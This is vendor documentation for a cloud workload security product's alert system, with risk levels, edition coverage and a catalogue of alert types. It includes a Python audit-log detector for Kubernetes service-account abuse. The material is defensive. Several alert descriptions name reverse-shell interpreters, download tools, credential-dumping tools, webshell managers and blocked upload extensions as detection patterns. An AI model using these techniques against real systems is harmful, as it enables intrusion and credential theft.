Security Center:Overview of CWPP (Cloud Workload) security alerts

Last Updated: Jan 19, 2026

Security Center detects security alerts on your assets in real time, including alerts for web tamper-proofing, anomalous processes, webshells, unusual logons, and malicious processes. Security Center uses threat detection models to provide comprehensive detection, which helps you identify security threats on your assets and understand your security posture in real time.

Function overview

Risk levels

Security Center classifies alerts into three risk levels to help you prioritize them.

Risk level

Description

Recommended action

Urgent

  • The behavior is highly similar to known attacker behavior and may cause destructive or persistent impact on assets, such as a reverse shell.

  • This level indicates that the asset is very likely under attack.

Respond immediately. Recommended actions: quarantine the asset, block suspicious network connections, and preserve the attack scene.

Suspicious

  • The behavior has potential risks but may be similar to some O&M operations, such as "suspicious user addition".

  • The behavior is a non-critical step in the attack path, such as "clearing attack traces".

  • This level indicates a certain probability that the asset is under attack.

Requires analysis. Check if it is a planned O&M operation. If yes, add the behavior to the whitelist. If not, handle it as an urgent alert.

Reminder

The alert behavior is a non-essential step in the attack path and is similar to normal O&M behavior, such as "suspicious port listening behavior".

Audit and optimize. Use this to find non-compliant configurations or potential risks. Periodically review and optimize security policies. Immediate action is not required.

Threat detection model

Security Center uses more than 380 threat detection models for comprehensive threat detection. These models cover key stages of the attack chain and detect a wide range of attack behaviors. The following sections describe examples of detection stages and models:

Note

On the Alert page, you can click the Threat Detection Model icon in the upper-left corner to view the threat detection models that Security Center provides.

  • Initial Access: Includes anomalous command execution in Java applications and web vulnerability exploits.

  • Code Execution: Includes reverse shells and malicious script code execution.

  • Persistence: Includes suspicious writing of passwordless logon certificates and exploitation of misconfigured Redis.

  • Privilege Escalation: Includes exploitation of misconfigured Redis and unauthorized execution of high-risk commands.

  • Defense Evasion: Includes unusual logons by RAM users and suspicious programs.

  • Credential Access: Includes logons to an ECS instance from an unusual location and successful brute-force attacks on an ECS instance.

  • Discovery: Includes suspicious access to OSS and suspected scanning of sensitive ports.

  • Lateral Movement: Includes worms and suspicious network connections in Windows.

  • Collection: Includes port scanning and suspected man-in-the-middle attacks on a Kubernetes service (CVE-2020-8554).

  • Data Leakage: Includes requests to out-of-band (OOB) attack domain names and suspicious command and control (C2) Trojan communication.

  • Remote Control: Includes Trojan programs and backdoor programs.

  • Impact and Damage: Includes DDoS Trojans and ransomware.

  • Prepare Resources: Includes self-mutating Trojans and hacking tools.

  • Target Discovery: Includes proactive connections to malicious download sources and scanners.

Alert feature limits

Security Center protects your assets by providing real-time alerts, vulnerability management, and attack source tracing. However, Security Center has limitations. For comprehensive protection, we recommend that you adopt a defense in depth strategy:

  • Delayed startup: When a server restarts, the Security Center agent requires time to initialize. During this period, the server is vulnerable to fast-acting threats, such as ransomware and DDoS trojans.

  • Unknown threats: Attack methods and viruses are constantly evolving, and business environments vary. Consequently, Security Center cannot guarantee the real-time detection and prevention of all unknown threats.

To build a more robust defense, you can supplement Security Center with the following measures:

  1. Regularly apply security patches to the operating system and the applications on your servers.

  2. Use other products, such as Cloud Firewall and Web Application Firewall, to reduce the network attack surface.

Alert handling flow

[Figure: Alert handling flow]

Version support

Subscription

Service Edition

Detection scope

Alert handling capabilities

Basic, Value-added Plan

Common simple attacks on the cloud, including traditional one-line webshells, logons from unusual locations, self-mutating Trojans, DDoS Trojans, and mining programs (does not include container assets)

Alert suppression: Add to Whitelist, Ignore, and more.

Anti-virus

Capabilities of the Basic Edition plus detection and precise defense models for suspicious and malicious files (including binaries) (does not include container assets)

  • Threat purge includes Virus Detection and Removal, Deep Cleanup, and Quarantine.

  • Alert suppression includes Add to Whitelist and Ignore.

Advanced

Capabilities of the Anti-virus Edition plus detection and precise defense models for suspicious and malicious process activities and file operations (does not include container assets)

Enterprise

Capabilities of the Advanced Edition plus over 380 detection and precise defense models for all malicious behaviors such as process activities, file operations, and network connections (does not include container assets)

Ultimate

Capabilities of the Enterprise Edition (covers container assets) plus detection and proactive defense models for container-specific attack behaviors such as container escapes, running risky images, and starting non-image programs

Pay-as-you-go

Protection level

Detection scope

Alert handling capabilities

Unprotected

Common simple attacks on the cloud, including traditional one-line webshells, logons from unusual locations, self-mutating Trojans, DDoS Trojans, and mining programs (does not include container assets)

Alert suppression: Add to Whitelist, Ignore, and more.

Antivirus

Capabilities of the Unprotected level plus detection and precise defense models for suspicious and malicious files (including binaries) (does not include container assets)

  • Threat removal: Virus Detection and Removal, Deep Cleanup, Quarantine, and more.

  • Alert suppression: Add to Whitelist, Ignore, and more.

Host Protection

Capabilities of the Antivirus level plus over 380 detection and precise defense models for all malicious behaviors such as process activities, file operations, and network connections (does not include container assets)

Hosts and Container Protection

Capabilities of Host Protection (covers container assets) plus detection and proactive defense models for container-specific attack behaviors such as container escapes, running risky images, and starting non-image programs.

Security alert types

Type

Description

Network Defense Alert (formerly Attack Analysis)

If you enable rules in the Network Threat Prevention category of Malicious Behavior Defense for Hosts and the Brute-force Attack Protection for Hosts policies, Security Center automatically blocks detected attacks based on these protection rules and generates Network Defense Alerts. For more information, see Network Defense Alerts (formerly Attack Analysis).

Important
  • For newly purchased cloud products, you must wait for Security Center to automatically synchronize network attack data. Data synchronization takes about 3 hours. After the synchronization is complete, you can view the attack analysis information.

  • Defense alerts are the result of automatic blocking by Security Center. No action is required.

Precise Defense

The Malicious Host Behavior Prevention feature generates alerts based on the enabled defense rules. These alerts are reported under the Precise Defense type. For more information about the Malicious Host Behavior Prevention feature, see Host protection settings.

Suspicious Process Behavior

Detects unusual process behavior, such as running suspicious command sequences, starting from an abnormal path, process injection, and unauthorized changes to system files or configurations.

Webshell

Detects webshell backdoor files on the server, or non-program files such as logs and images that have been injected with malicious code.

Unusual Logon

Detects unconventional logons that do not comply with preset policies, successful brute-force attacks, and logon attempts from known malicious IP addresses or backdoor accounts.

Malware

Detects various types of malware running or present on the host, including viruses, Trojans, ransomware, mining programs, and hacking tools.

Cloud Service Threat Detection

Detects theft and abuse of cloud platform identity credentials (such as AccessKeys), along with abnormal configuration and permission probing of cloud resources.

Unusual Network Connection

Detects various suspicious network behaviors on the server, such as port scanning, connections to malicious sources, and reverse shells. These are typical signs of attack reconnaissance, remote control, and lateral movement.

Note

Detection of encrypted HTTPS traffic is not supported.

Malicious Script

A malicious or suspicious script file is found on the server and related code execution is detected. This indicates that an attacker has compromised the system and is executing malicious instructions.

Persistent Webshell

Detects persistence mechanisms set up by attackers to maintain long-term control, such as creating auto-start items, memory-resident backdoors, hidden processes, and exploiting advanced system features.

Sensitive File Tampering

Detects tampering with core system files and configurations (such as shared library preload files). Attackers use methods like modifying, replacing, or moving files to achieve persistence or bypass security detection.

Container Cluster Anomaly

Detects multi-dimensional and multi-stage attack behaviors in the container cluster. This mainly involves using a service account for privilege escalation (such as abnormal token creation, binding to high-privilege roles), lateral movement (such as entering a container to execute commands, accessing kubelet), and information theft (such as enumerating Secrets).

Suspicious Account

An anomalous account is detected in the system.

Webshell Detection (Local Scan)

Scores the threat level based on file behavior to identify suspicious files with dangerous functions and features.

Exploit

Detects attack behaviors that exploit known vulnerabilities in the operating system or applications to achieve remote code execution, privilege escalation, or container escape.

Abnormal Network Traffic

Identifies attacks that have occurred and ongoing malicious activities by analyzing network traffic and correlating it with host behavior.

Container Escape Prevention

After you create a Container Escape Prevention rule in Proactive Defense for Containers, if a process inside a container attempts to perform an unauthorized operation that conflicts with the rule definition (such as accessing a sensitive path on the host or using privileges for escalation), the defense module will block the operation and generate a security alert.

Proactive Defense for Containers

Proactive Defense for Containers provides two core runtime security capabilities and generates security alerts for all detected risky behaviors:

  • Non-image Program Defense: Real-time detection and blocking of programs started in a container that are not part of the original image. This effectively prevents malicious behaviors such as Trojan implantation.

  • Container File Defense: Real-time monitoring of specified files or directories within a container, alerting or blocking malicious tampering.

Risk Image Blocking

After you create a Risky Image Blocking rule in Proactive Defense for Containers, Security Center checks the image in real time whenever a resource (such as a pod) is created from it in the cluster. For images that match the rule, Security Center applies the action configured in the rule (alert, block, or allow) and generates a security alert.

Trusted Exception

Checks the trust status of ECS trusted instances and reports anomalies in that status.

Other

Abnormal offline status of the Security Center client, DDoS flood attacks, and more.
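
The service-account behaviors listed under Container Cluster Anomaly (token creation, binding to high-privilege roles, entering a container, reaching the kubelet, enumerating Secrets) all leave records in the Kubernetes API server audit log, which is where an analyst confirms such an alert. The following is an added example written for this page, not Security Center's detection code: it scores constructed audit.k8s.io/v1 events for those five behaviors. The event lines, the service-account name, and the set of role names treated as high-privilege are assumptions.

```python
import json

# Role names treated as high privilege when bound to a service account (assumption).
HIGH_PRIV_ROLES = {"cluster-admin", "admin", "edit"}


def classify(event):
    """Return finding strings for one audit.k8s.io/v1 Event, empty if nothing matched."""
    # The API server logs a request at RequestReceived and again at ResponseComplete;
    # score only the final stage so each request yields one finding.
    if event.get("stage") != "ResponseComplete":
        return []
    user = event.get("user", {}).get("username", "")
    # Scope to service-account actors, as the alert type does.
    if not user.startswith("system:serviceaccount:"):
        return []
    verb = event.get("verb")
    ref = event.get("objectRef", {})
    res, sub = ref.get("resource"), ref.get("subresource")
    ns, name = ref.get("namespace", "-"), ref.get("name", "-")
    findings = []
    # Privilege escalation: minting a token for a (more privileged) service account.
    if verb == "create" and res == "serviceaccounts" and sub == "token":
        findings.append(f"privilege-escalation: token minted for serviceaccount {ns}/{name}")
    # Privilege escalation: binding to a high-privilege role. requestObject is only
    # present when the audit policy level is RequestResponse (assumption here).
    if verb == "create" and res in ("clusterrolebindings", "rolebindings"):
        role = event.get("requestObject", {}).get("roleRef", {}).get("name", "")
        if role in HIGH_PRIV_ROLES:
            findings.append(f"privilege-escalation: {res[:-1]} created to role {role}")
    # Lateral movement: entering a container. Direct calls to the kubelet port bypass
    # the API server, so only the nodes/proxy path is visible in this log.
    if res == "pods" and sub == "exec":
        findings.append(f"lateral-movement: exec into pod {ns}/{name}")
    if res == "nodes" and sub == "proxy":
        findings.append(f"lateral-movement: kubelet reached through nodes/proxy on {name}")
    # Information theft: enumerating Secrets.
    if verb == "list" and res == "secrets":
        findings.append(f"information-theft: secrets listed in namespace {ns}")
    return findings


def scan(lines):
    """Run classify() over JSON audit lines; return (auditID, username, httpCode, finding)."""
    out = []
    for line in lines:
        ev = json.loads(line)
        for finding in classify(ev):
            code = ev.get("responseStatus", {}).get("code")
            out.append((ev["auditID"], ev["user"]["username"], code, finding))
    return out


def _event(audit_id, user, verb, resource, sub=None, ns=None, name=None, code=200,
           request_object=None, stage="ResponseComplete"):
    """Build one constructed audit event line in the audit.k8s.io/v1 shape."""
    ref = {"resource": resource}
    if sub:
        ref["subresource"] = sub
    if ns:
        ref["namespace"] = ns
    if name:
        ref["name"] = name
    ev = {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "auditID": audit_id,
          "stage": stage, "verb": verb, "user": {"username": user},
          "objectRef": ref, "responseStatus": {"code": code}}
    if request_object is not None:
        ev["requestObject"] = request_object
    return json.dumps(ev)


SA = "system:serviceaccount:default:web"  # compromised workload identity (constructed)

# Constructed sample log: five hostile actions by the service account, one duplicate
# stage line, one human-user read and one ordinary workload read.
SAMPLE_LINES = [
    _event("a1", SA, "create", "serviceaccounts", sub="token", ns="kube-system", name="admin-sa", code=201),
    _event("a1", SA, "create", "serviceaccounts", sub="token", ns="kube-system", name="admin-sa",
           stage="RequestReceived"),
    _event("a2", SA, "create", "clusterrolebindings", name="web-admin", code=201,
           request_object={"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"}}),
    _event("a3", SA, "create", "pods", sub="exec", ns="default", name="db-0", code=101),
    _event("a4", SA, "get", "nodes", sub="proxy", name="node-1"),
    _event("a5", SA, "list", "secrets", ns="kube-system"),
    _event("a6", "alice", "list", "secrets", ns="kube-system"),       # human user: out of scope here
    _event("a7", SA, "get", "configmaps", ns="default", name="app"),  # ordinary workload read
]

if __name__ == "__main__":
    for audit_id, user, code, finding in scan(SAMPLE_LINES):
        print(audit_id, code, user, finding)
```

A denied request (response code 403) still produces a finding here on purpose: a service account probing for Secrets it cannot read is reconnaissance worth seeing, so the HTTP code is carried in the result rather than used as a filter.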

Alert check items

Precise Defense

Alert name

Description

DDoS Trojan

The detection model found a DDoS Trojan running on your server. A DDoS Trojan is a malicious program that runs on a compromised host, receives instructions from the attacker's control server, and launches DDoS attacks against targets that the attacker specifies.

Ransomware

The detection model found ransomware running on your server. Ransomware is a malicious program that encrypts critical data files on a host and demands a ransom for the decryption key.

Backdoor program

The detection model found a backdoor program running on your server. A backdoor program is a persistent program implanted in the system that allows an attacker to maintain continuous access to the host.

Malicious program

A cloud scan detected a malicious program.

Infectious virus

The detection model found an infectious virus running on your server. An infectious virus is a malicious program that injects its code into normal program files. As a result, many normal programs become infected and are themselves detected as malicious.

Mining program

The detection model found a mining program running on your server. A mining program is a program that seizes host computing resources to mine virtual currency. This activity often results in high CPU usage and the presence of other related malicious programs on the host.

Trojan program

The detection model found a Trojan program on your server. A Trojan program is specifically designed to infiltrate a user's host. It typically disguises itself to be implanted into the system and then downloads and runs other malicious programs.

Worm

The detection model found a worm running on your server. A worm is a program used for lateral movement attacks from a compromised host to other hosts. A worm often performs activities such as exploiting vulnerabilities and cracking passwords.

Suspicious program

The detection model found a suspicious program running on your server. A suspicious program is a program that has malicious code characteristics or exhibits highly suspicious behavior but is not yet clearly classified. You must evaluate the program based on the information provided.

Self-mutating Trojan

The detection model found a self-mutating Trojan running on your server. A self-mutating Trojan is a Trojan program with self-mutation capabilities that changes its own hash or copies itself to many different paths and runs in the background to evade detection and cleanup.

Malicious IP blocking

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Malicious DNS request blocking

Alibaba Cloud Security detected that your ECS instance is communicating with a malicious domain name. This may indicate that an attacker has compromised your server. Precise Defense successfully blocked this network request to prevent damage to the server.

Process behavior blocking

A high-risk command was detected. This may be a malicious action by an attacker on a compromised server. Security Center's Precise Defense feature successfully blocked this malicious command to prevent damage to the server.

Malicious disruption of client process

Suspicious process modification behavior that disrupts the normal operation of the client was detected. This action was proactively blocked to prevent the behavior from undermining real-time threat detection. Attackers often disrupt security measures to compromise a host. Pay close attention to this alert. Check for other security alerts, high-risk vulnerabilities, or weak password risks on the server. If you initiated this action, you can ignore this alert.

Malicious disruption of client file

Suspicious file modification behavior that disrupts the normal operation of the client was detected. This action was proactively blocked to prevent the behavior from undermining real-time threat detection. Attackers often disrupt security measures to compromise a host. Pay close attention to this alert. Check for other security alerts, high-risk vulnerabilities, or weak password risks on the server. If you initiated this action, you can ignore this alert.

Exploit program

The detection model found an exploit program running on your server. An exploit program is used to attack known vulnerabilities in the operating system or applications to achieve objectives such as privilege escalation, container escape, or arbitrary code execution.

Bait capture for ransomware protection

A suspicious process accessed a pre-set bait (decoy) file, which is behavior typical of ransomware. The process was detected or blocked.

Webshell malicious connection blocking

A malicious webshell connection was blocked.

Hacking tool

The detection model found a hacking tool on your server. Attackers use hacking tools during an intrusion for privilege escalation, sensitive data theft, or security software uninstallation. Hacking tools can also be implanted as backdoor programs after an intrusion.

Windows backdoor account logon session blocking

An attempt by an attacker to log on to this machine with a backdoor account was detected. Security Center blocked this logon attempt.

Process start blocking (custom)

Security Center lets you add the MD5 hashes of process files. Proactive defense blocks a process at startup when its file matches one of those hashes. Because the match is on the exact hash, a rebuilt or self-mutating variant of the same program will not be caught by this rule.

AntSword webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Cknife webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Rootkit

The detection model found a rootkit on your server. A rootkit is a malicious module implanted at the system's core to hide its own traces or the traces of other malicious programs.

XISE webshell communication

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Reverse shell

A reverse shell is a connection that a compromised server opens outbound to a listener that the attacker controls; the attacker then sends commands over that connection and controls the server even when inbound connections are blocked. This alert is triggered by reverse shells implemented with processes such as bash, python, perl, lua, php, and telnet.

Unauthorized execution of high-risk commands

An attacker elevates their privileges on a victim server by exploiting vulnerabilities or misconfigurations, such as the Dirty COW vulnerability or sudo privilege escalation.

Webshell command execution

An attacker uses a webshell management tool, such as Cknife, AntSword, Behinder, or Godzilla, to communicate with the webshell on a victim server and execute arbitrary commands.

Counteracting security software

An attacker attempts to disable security software or delete security configurations. Examples include stopping the Server Guard program or disabling the firewall.

Implanting suspicious files

An attacker exploits a vulnerability or uses a weak password to log on and write suspicious files using commands such as wget, curl, tar, and powershell.

Implanting malicious files

An attacker exploits a vulnerability or uses a weak password to log on and write malicious files using commands such as wget, curl, tar, and powershell.

Suspicious worm script behavior

An attacker exploits a vulnerability or uses a weak password to log on and implant a suspicious worm script. This alert is triggered by scripts such as bash, python, perl, and powershell.

Downloading and running malicious files from the command line

An attacker exploits a vulnerability or uses a weak password to log on, remotely execute commands, and download and implant malicious files. This alert is triggered by download commands such as wget, curl, python, and powershell.

High-risk operation by a web service

An attacker exploits a web vulnerability, such as a Confluence or Exiftool vulnerability, to execute arbitrary commands.

Information gathering

A service program executes host commands, such as whoami, netstat, and id, to collect host information and determine whether remote command execution was successful.

Cloud Assistant advanced protection

This alert indicates that the Cloud Assistant token may have been leaked or stolen. The protection rule prevents Cloud Assistant from being used to execute arbitrary commands.

Suspicious network connection

An attacker runs a malicious program or uses a system program to connect to the network, receive instructions from a control end, and thereby control the victim server. This behavior is associated with DDoS attacks, mining programs, reverse shells, and more.

Obfuscated command

An attacker encrypts, encodes, or otherwise manipulates host commands to bypass antivirus protection. Examples of manipulation include using base64 or other encoding methods.

High-risk command execution by PowerShell

An attacker uses the system's PowerShell component to execute malicious commands. These commands can include malicious behaviors such as downloading or executing a payload.

Suspicious command execution by PowerShell

An attacker uses the system's PowerShell component to execute malicious commands. These commands can include malicious behaviors such as downloading or executing a payload.

High-risk operation by a browser service

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

Suspicious operation by an entry service

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

High-risk operation by a system process

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

High-risk operation by a Java service

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

High-risk operation by an Office component

An attacker uses an entry service to perform malicious operations, including malicious behaviors such as remotely downloading or executing a payload using a trusted system component.

Loading a high-risk driver

A virus, Trojan, or hacking tool bypasses antivirus protection by loading a driver module.

High-risk account manipulation behavior

An attacker performs unauthorized account operations to achieve persistence.

Malicious command execution

An attacker calls system tools to execute commands or scripts that perform various malicious behaviors.

Suspicious process startup

A suspected virus or Trojan started a process.

System backup deletion behavior

Ransomware was detected deleting system backups to prevent data restoration.

Internal network scan

An attacker expands the scope of an intrusion by scanning for weaknesses in internal network assets or by attempting to log on with the same password. This includes activities such as brute-force attacks, password spraying, and web vulnerability scanning.

Creating a service auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a high-risk auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a scheduled task auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a registry auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Creating a WMI auto-start item

A virus creates a persistent startup item using the registry, scheduled tasks, or services.

Clearing intrusion traces

An attacker attempts to destroy intrusion traces by deleting system logs, command execution records, or other data.

High-risk credential theft behavior

An attacker attempts to steal logon credentials using credential theft tools such as Mimikatz.

HashDump attack

An attacker uses memory dump tools such as Procdump to attempt to access the Local Security Authority (LSA) process and obtain credential data.

Hijacking a dynamic-link library

Security Center found that a system program is loading a suspicious dynamic-link library file or has implanted a malicious dynamic-link library file. This is suspected to be an attacker hijacking a dynamic-link library file to hijack system functions. Security Center has successfully blocked this behavior. If you believe this block was a false positive, you can disable the "Hijack dynamic-link library" ruleset on the Proactive Defense - Malicious Behavior Defense page or remove the affected machine from the managed hosts.

Behinder webshell communication

An attacker uses a webshell management tool, such as Cknife, AntSword, Behinder, or Godzilla, to communicate with the webshell on a victim server and execute arbitrary commands.

Godzilla webshell communication

An attacker uses a webshell management tool, such as Cknife, AntSword, Behinder, or Godzilla, to communicate with the webshell on a victim server and execute arbitrary commands.

Sensitive registry key protection

Protection for sensitive registry keys, including defense for persistent startup items, group policy configuration items, system security configuration items, and image file execution options hijacking.

Process injection protection

An attacker injects malicious code into a normal process to bypass detection and defense. An example is a ptrace injection.

Proxy tool

The detection model found a proxy tool on the host. Proxy tools are used by attackers for operations such as proxying and tunneling, often in scenarios of further server intrusion.

Cloud Assistant service information gathering

The Cloud Assistant service executes host commands, such as whoami, netstat, and id, to collect host information and determine whether remote command execution was successful.

LSA security authority service protection

The Local Security Authority Subsystem Service (LSASS) is the process that enforces the operating system's security policy and holds logon credentials in memory. Attackers can perform malicious actions, such as dumping those credentials, by reading from or writing to the LSASS process memory. This protection rule prohibits any process from opening the LSASS process with the PROCESS_VM_READ or PROCESS_VM_WRITE access right. Note: This protection capability is a security hardening feature that blocks by default and does not generate alerts. If your business requires reading from or writing to the LSASS process memory, you can disable this protection rule.

Entry service implants suspicious script or binary file

A database, web, or other service was detected implanting a suspicious script or binary file.

Entry service executes suspicious behavior sequence

An attacker uses an entry service to perform a series of malicious operations, such as executing download commands, reading and writing files, and gathering information, all under the same parent process.

Adaptive webshell communication blocking

The detection model found malicious webshell communication traffic on your server. An attacker can use this method for remote control of the server. Precise Defense successfully blocked this network request to prevent damage to the server.

Webshell upload

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Scanner

The detection model found a scanner on the host. Scanners are often used by attackers to discover live hosts, open ports, and hosts with security risks such as vulnerabilities and weak passwords. This is often done to facilitate further intrusions.

Java general RCE vulnerability blocking

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Adaptive web attack defense

Security Center uses a cloud-based intelligent analysis engine to automatically identify and block various web remote command execution (RCE) attack traffic to prevent malicious requests from damaging your server. If you believe this block was a false positive, you can disable the corresponding rule on the Proactive Defense - Malicious Behavior Defense page or remove the affected machine from the managed hosts.

Downloader Trojan

The detection model found a downloader Trojan on your server. A downloader Trojan typically downloads and runs third-party programs such as malicious Trojans and adware.

Host defense link test

This alert is used to test whether the host defense link is effective.

Database service information gathering

A database service program executes host commands, such as whoami, netstat, and id, to collect host information and determine whether remote command execution was successful.

Alibaba Cloud Security process protection

Protects Alibaba Cloud Security processes against abnormal access.

Webshell file defense

Security Center found a webshell on your server, and an attacker is attempting to use it. The defense module identified and precisely defended against this behavior. Note that although the defense module successfully blocked the action, if you confirm that this file is a backdoor, you must manually quarantine or delete it as soon as possible. To add this file to a whitelist, go to Mitigation Settings > Host Protection > Host Rule Management > Custom Defense Rules and create a whitelist rule for this file path. To disable the webshell file defense feature, go to Mitigation Settings > Host Protection > Host Rule Management > System Defense Rules > Webshell File Defense and turn off the switch.

SQL Server brute-force attack

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

PHP webshell upload

An attacker uses the file upload feature to upload a PHP webshell. Security Center blocks the upload of files with .php and .phtml extensions.

JSP webshell upload

An attacker uses the file upload feature to upload a JSP webshell. Security Center blocks the upload of files with the .jsp extension.

ASP webshell upload

An attacker uses the file upload feature to upload an ASP webshell. Security Center blocks the upload of files with .asp, .ashx, .asa, .asmx, and .cshtml extensions.

Webshell upload with special extension

An attacker uses the file upload feature to upload a webshell with a special extension. Security Center blocks the upload of files with .cer and .ascx extensions.

Operating system account behavior

This ruleset blocks operating system account behavior at the system's core. It is disabled by default. You can evaluate and enable it as needed.

Webshell upload intelligent defense

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Suspicious file upload via interface

An attacker uses certain interfaces to upload a suspicious webshell. Security Center blocks the upload feature of these interfaces.

Information-stealing tool

The detection model found an information-stealing tool on the host. Information-stealing tools are often used to steal various sensitive files and information from a host.

System persistent process access protection

System persistent processes and services carry the core functions of the system. Attackers often access system processes with high-risk permissions to carry out their malicious actions. This protection rule prohibits any process from accessing system persistent processes with high-risk permissions. This includes thread creation, handle copying, and memory operations. Note: This protection capability is a security hardening feature that blocks by default and does not generate alerts. If your business requires access to system persistent processes, you can disable this protection rule.

RDP brute-force attack

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

SSH brute-force attack

Precise Defense detected an attack attempt and successfully blocked the network request to prevent damage to the server. This alert does not mean that the server has been compromised.

Malicious driver

An attacker installs a rootkit by installing or compiling malicious code, loading .ko or .sys driver files, or using other methods.

Ransomware

A suspicious file was found on your system disk. We recommend that you confirm the legitimacy of the file before you handle it.

Non-trusted process startup

The startup of a process that is not on the whitelist was blocked.

Anomalous startup of a non-trusted process chain

The anomalous startup of processes in a non-trusted process chain was blocked.

High-risk network operation by a non-trusted process

A process that is not on the whitelist was blocked from anomalously accessing public or internal network IP addresses.

High-risk file operation by a non-trusted process

A high-risk operation by a process that is not on the whitelist was blocked. An example is anomalously modifying office documents or critical system configuration files.

Network request blocking

An anomalous network request was detected. Precise Defense successfully blocked the request to prevent damage to the host. This alert does not mean that the host has been compromised.

Suspicious Process Behavior

Alert name

Description

Reverse shell

Security Center detected that a reverse shell command was executed on your server. An attacker used this method to establish a reverse network connection with their own server, through which arbitrary commands can be executed.

Anomalous command execution in a Java application

The detection model found that a Java process on your server initiated high-risk behaviors such as downloading malicious programs or adding backdoors. This is likely because you use a vulnerable web framework or middleware.

Anomalous command execution in MySQL

The detection model found that your MySQL service executed a suspicious command. This may be because of a weak password in the MySQL service or an SQL injection in a web service.

Anomalous command execution in a PostgreSQL application

The detection model found that your PostgreSQL service executed a suspicious command. This may be because of a weak password in the PostgreSQL service or an SQL injection in a web service.

Exploitation due to misconfigured Redis

The detection model found that the Redis application on your server wrote a suspicious file to the disk. This may be because an attacker executed a malicious SQL command through a blank or weak Redis password, which could give the attacker direct access to the server.

Suspicious writing of a passwordless logon certificate

Alibaba Cloud Security detected an anomalous file change in the server's root certificate directory. This may be an attacker attempting to inject a passwordless certificate into the server for subsequent logon attacks.

Suspicious information leak via HTTP tunnel

The detection model found behavior on your server where the result of a command execution was sent to an external server via an HTTP channel. This may be an attacker returning the result of a command executed through a remote command execution (RCE) vulnerability to their own server.

Suspicious UDF library file written by misusing the Postgres export function

The detection model found that the Postgres application on your server is attempting to write a suspicious .so file to the disk. This may be because an attacker logged in with a weak Postgres password and executed a malicious SQL command. This file could allow the attacker to control your server.

Suspicious file written by misusing the MySQL export function

The detection model found that the MySQL application on your server is attempting to write a file to a sensitive directory. This may be because an attacker executed a malicious SQL command through a weak password or a web application.

Suspicious CMD command sequence

The detection model found that a process on your system executed a series of suspicious commands. These commands are very similar to the command sequences typically executed by an attacker after an intrusion. We recommend that you investigate the parent process of these commands, which could be a remote control Trojan, a vulnerable web service, or a legitimate process injected with malicious code.

Anomalous operation on a Windows account

The detection model found that the context in which this command was operating on the system account is suspicious. This may be a user account operation by malware or an attacker.

Suspicious script operation

The detection model found that this command on your machine is related to a script and is highly suspicious. It is very likely related to malware or a cyberattack.

Anomalous registry operation

The detection model found that the way this command operates on the registry on your machine is highly suspicious. It may be a configuration modification by malware or an attacker after an intrusion.

Suspicious command execution

The detection model found that the command line of a process executed on your server is highly suspicious. It is very likely related to a Trojan, virus, or hacking behavior.

Suspicious obfuscated command in Windows

The command line executed on the host was detected to be likely obfuscated. Malware execution or hacking processes often use case variations or special characters to obfuscate the command line to bypass security detection.

Suspicious process path

The detection model found that a process on your server started from an unusual path. Regular software is not typically located in such directories. This process could be a virus, a Trojan, or a tool placed during a cyberattack.

Suspicious encoded command

The detection model found that the command line of a process executed on your server is highly suspicious. It is very likely related to a Trojan, virus, or hacking behavior.

Suspicious command sequence in Linux

The detection model found that a process on your system executed a series of suspicious commands. These commands are very similar to the command sequences typically executed by an attacker after an intrusion. We recommend that you investigate the parent process of these commands, which could be a reverse shell, a remote control Trojan, a vulnerable web service, or a legitimate process injected with malicious code.

Anomalous deletion of system logs

The detection model found a process on your system attempting to delete system logs. Malware or attackers often clear system logs to evade detection.

Anomalous deletion of system backups

The detection model found a process on your system attempting to delete system backup files. This could be ransomware trying to prevent file restoration to extort a ransom.

Anomalous modification of system security configuration

The detection model found a process on your machine that modified the system security configuration. This could be malware or an attacker modifying firewall or antivirus software configurations to evade detection.

Anomalous call to a system tool

The detection model found a process on your system calling a system tool in a suspicious manner. Trojans or attackers often use this method to bypass conventional security software to perform malicious actions such as downloading malicious files, encrypting or decrypting data, or loading malicious code.

Anomalous modification of a startup item

The detection model found a process on your machine attempting to modify the system's auto-start items. This could be a Trojan or an attacker using startup items to maintain persistence.

Suspicious probing command

Suspicious probing command.

Suspicious command execution inside a container

The detection model found anomalous command execution inside your container, which indicates an intrusion risk.

Running a malicious container image

The detection model found that your server is running a malicious container image. This image is highly likely to contain a backdoor, mining program, virus, or known severe vulnerabilities. Investigate and use trusted image resources promptly.

Privilege escalation or escape inside a container

Security Center detected suspicious behaviors such as attempts at privilege escalation or escape inside the container. This is common in actions like accessing docker.sock, using escape tools, or creating cgroups. There is also a chance that this is a normal business operation. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

Privileged container startup

The detection model found a suspicious privileged container starting on your server. Privileged containers reduce the security of the container runtime. If compromised, they can endanger other containers and assets on the host server. Ensure that your privileged containers use trusted image sources and that their running services are difficult to compromise.

Risky Docker remote debugging interface

